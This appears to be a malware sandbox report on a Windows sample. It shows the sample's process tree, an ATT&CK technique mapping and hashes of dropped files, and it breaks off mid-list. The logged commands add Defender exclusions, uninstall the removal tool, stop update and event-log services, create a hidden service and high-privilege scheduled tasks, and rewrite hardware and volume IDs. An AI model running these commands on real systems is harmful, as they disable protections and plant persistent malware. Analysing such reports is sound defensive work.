"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
4⤵
PID:1708

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 225745HP-TRGT30904RV
5⤵
PID:2364

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
4⤵
PID:2556

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 825745HP-TRGT30904SG
5⤵
PID:1276

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
4⤵
PID:2452

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
5⤵
PID:1356

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
4⤵
PID:2504

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 525745HP-TRGT30904SL
5⤵
PID:1136

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
4⤵
PID:2936

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 425745HP-TRGT30904FA
5⤵
PID:2164

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
4⤵
PID:1672

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 625745HP-TRGT30904FU
5⤵
PID:1608

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
4⤵
PID:1424

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 325745HP-TRGT30904DQ
5⤵
PID:2288

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
4⤵
PID:1500

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 725745HP-TRGT30904MST
5⤵
PID:2524

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
4⤵
PID:276

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
5⤵
PID:2156

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
4⤵
PID:400

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 25761HP-TRGT19110AB
5⤵
PID:2908

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
4⤵
PID:2940

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 225761HP-TRGT19110RV
5⤵
PID:1868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
4⤵
PID:376

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 825761HP-TRGT19110SG
5⤵
PID:2744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
4⤵
PID:2260

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
5⤵
PID:536

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
4⤵
PID:328

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 525761HP-TRGT19110SL
5⤵
PID:1580

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
4⤵
PID:1452

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 425761HP-TRGT19110FA
5⤵
PID:1752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
4⤵
PID:2532

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 625761HP-TRGT19110FU
5⤵
PID:2832

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
4⤵
PID:768

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 325761HP-TRGT19110DQ
5⤵
PID:332

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
4⤵
PID:3000

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 725761HP-TRGT19110MST
5⤵
PID:872

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
4⤵
PID:2736

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
5⤵
PID:744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: IC4H-SP0J
4⤵
PID:2780

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: IC4H-SP0J
5⤵
PID:1356

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: EFGB-B3CM
4⤵
PID:2340

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: EFGB-B3CM
5⤵
PID:1552

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: FSZ5-MNEN
4⤵
PID:1440

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: FSZ5-MNEN
5⤵
PID:1544

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: GL55-A6K6
4⤵
PID:780

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: GL55-A6K6
5⤵
PID:2616

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: ZOA6-8GTZ
4⤵
PID:2528

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: ZOA6-8GTZ
5⤵
PID:1212

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: 8TD1-CH24
4⤵
PID:2768

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: 8TD1-CH24
5⤵
PID:2644

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: V00Z-0PT7
4⤵
PID:2592

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: V00Z-0PT7
5⤵
PID:2904

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 76H6-EGG9
4⤵
PID:2440

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 76H6-EGG9
5⤵
PID:3028

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: B0P5-K3GV
4⤵
PID:2404

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: B0P5-K3GV
5⤵
PID:1960

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: KB0C-A3O4
4⤵
PID:1636

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: KB0C-A3O4
5⤵
PID:2368

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: IZ7I-D0VL
4⤵
PID:1716

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: IZ7I-D0VL
5⤵
PID:2172

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 3U76-VPBD
4⤵
PID:1348

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 3U76-VPBD
5⤵
PID:2852

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: OL0M-2JLB
4⤵
PID:2412

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: OL0M-2JLB
5⤵
PID:2936

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: JU54-TA0Z
4⤵
PID:1976

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: JU54-TA0Z
5⤵
PID:2104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: IVHC-C38T
4⤵
PID:2092

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: IVHC-C38T
5⤵
PID:2516

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: JG83-382J
4⤵
PID:992

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: JG83-382J
5⤵
PID:1868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: VJ1E-BF98
4⤵
PID:2608

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: VJ1E-BF98
5⤵
PID:576

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 5VC8-GI1S
4⤵
PID:1912

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 5VC8-GI1S
5⤵
PID:2796

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: C507-9PAC
4⤵
PID:1416

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: C507-9PAC
5⤵
PID:1284

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 54DA-ZU2Z
4⤵
PID:2148

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 54DA-ZU2Z
5⤵
PID:2572

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: KK35-8UVN
4⤵
PID:2160

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: KK35-8UVN
5⤵
PID:328

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: RJ6J-C7RA
4⤵
PID:1796

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: RJ6J-C7RA
5⤵
PID:744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: TIDU-6LAF
4⤵
PID:340

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: TIDU-6LAF
5⤵
PID:2240

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
4⤵
PID:2532

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
4⤵
PID:700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
4⤵
PID:2236

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
4⤵
PID:2976

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
4⤵
PID:1516

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
4⤵
PID:644

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
4⤵
PID:1540

C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
"C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:332

C:\Users\Admin\AppData\Roaming\.sphyperRuntimedhcpSvc.exe
"C:\Users\Admin\AppData\Roaming\.sphyperRuntimedhcpSvc.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\csrss.exe'
5⤵
PID:1780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\System.exe'
5⤵
PID:540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\LiveKernelReports\smss.exe'
5⤵
PID:1724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\System.exe'
5⤵
PID:2356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\System.exe'
5⤵
PID:616

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WVKPTXWNR3.bat"
5⤵
PID:2368

C:\Windows\system32\chcp.com
chcp 65001
6⤵
PID:1952

C:\Windows\system32\PING.EXE
ping -n 10 localhost
6⤵
- Runs ping.exe
PID:2580

C:\Users\All Users\Microsoft\System.exe
"C:\Users\All Users\Microsoft\System.exe"
6⤵
PID:3020

C:\Users\Admin\AppData\Roaming\conhostsft.exe
"C:\Users\Admin\AppData\Roaming\conhostsft.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1580

C:\Users\Admin\AppData\Roaming\.conhostsft.exe
"C:\Users\Admin\AppData\Roaming\.conhostsft.exe"
4⤵
- Executes dropped EXE
PID:1976

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
5⤵
PID:1516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
5⤵
PID:2300

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:644

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
5⤵
- Launches sc.exe
PID:812

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:3016

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
5⤵
- Launches sc.exe
PID:1632

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
5⤵
- Launches sc.exe
PID:2660

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
5⤵
- Launches sc.exe
PID:1864

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
5⤵
PID:2520

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
5⤵
PID:2496

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
5⤵
PID:1848

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
5⤵
PID:788

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "driverupdate"
5⤵
- Launches sc.exe
PID:2344

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
5⤵
- Launches sc.exe
PID:808

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
5⤵
- Launches sc.exe
PID:2144

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "driverupdate"
5⤵
- Launches sc.exe
PID:340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Windows\LiveKernelReports\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2280

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Windows\LiveKernelReports\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2200

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2160

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1580

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Microsoft\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1404

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1400

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2285468113949437591054971154-745506998922435561561022762-40680501-783537460"
1⤵
PID:920

C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
1⤵
PID:1772

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
PID:2512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
PID:2280

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:2008

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
2⤵
- Launches sc.exe
PID:1912

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:2744

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
2⤵
- Launches sc.exe
PID:2716

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
2⤵
- Launches sc.exe
PID:1452

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
2⤵
- Launches sc.exe
PID:796

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:2088

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
PID:332

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:108

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:560

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:1400

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-338965583-1859481052-3687907641879807021-1151094407-145010159824336749787142082"
1⤵
PID:2216

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "24900666-1551815401306810514-411755715-109528353583063915244928102555995849"
1⤵
PID:2220

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\DevManView.cfg
Filesize
1KB

MD5
43b37d0f48bad1537a4de59ffda50ffe

SHA1
48ca09a0ed8533bf462a56c43b8db6e7b6c6ffa8

SHA256
fc258dfb3e49be04041ac24540ef544192c2e57300186f777f301d586f900288

SHA512
cfb1d98328aed36d2fe9df008a95c489192f01d4bb20de329e69e0386129aff4634e6fd63a8d49e14fc96da75c9b5ed3a218425846907d0122267d50fc8d7a82

Download Submit
C:\ProgramData\Microsoft\Windows\Disk.bat
Filesize
1KB

MD5
250e75ba9aac6e2e9349bdebc5ef104e

SHA1
7efdaef5ec1752e7e29d8cc4641615d14ac1855f

SHA256
7d50c4fdcf6d8716c7d0d39517d479b3eeee02d2020ed635327405ae49c42516

SHA512
7f0d7d41c9eafcd65daa674b5182cf52e11aa0f6d6baaee74fe4c4ffc08a163277c4981cd123af0cb1857ae6fd223b5e8c676d9dc5c646a870fbd9bc4001c438

Download Submit
C:\ProgramData\Microsoft\Windows\amifldrv64.sys
Filesize
18KB

MD5
785045f8b25cd2e937ddc6b09debe01a

SHA1
029c678674f482ababe8bbfdb93152392457109d

SHA256
37073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba

SHA512
40bbeb41816146c7172aa3cf27dace538908b7955171968e1cddcd84403b2588e0d8437a3596c2714ccdf4476eefa3d4e61d90ea118982b729f50b03df1104a9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab2177.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2268.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
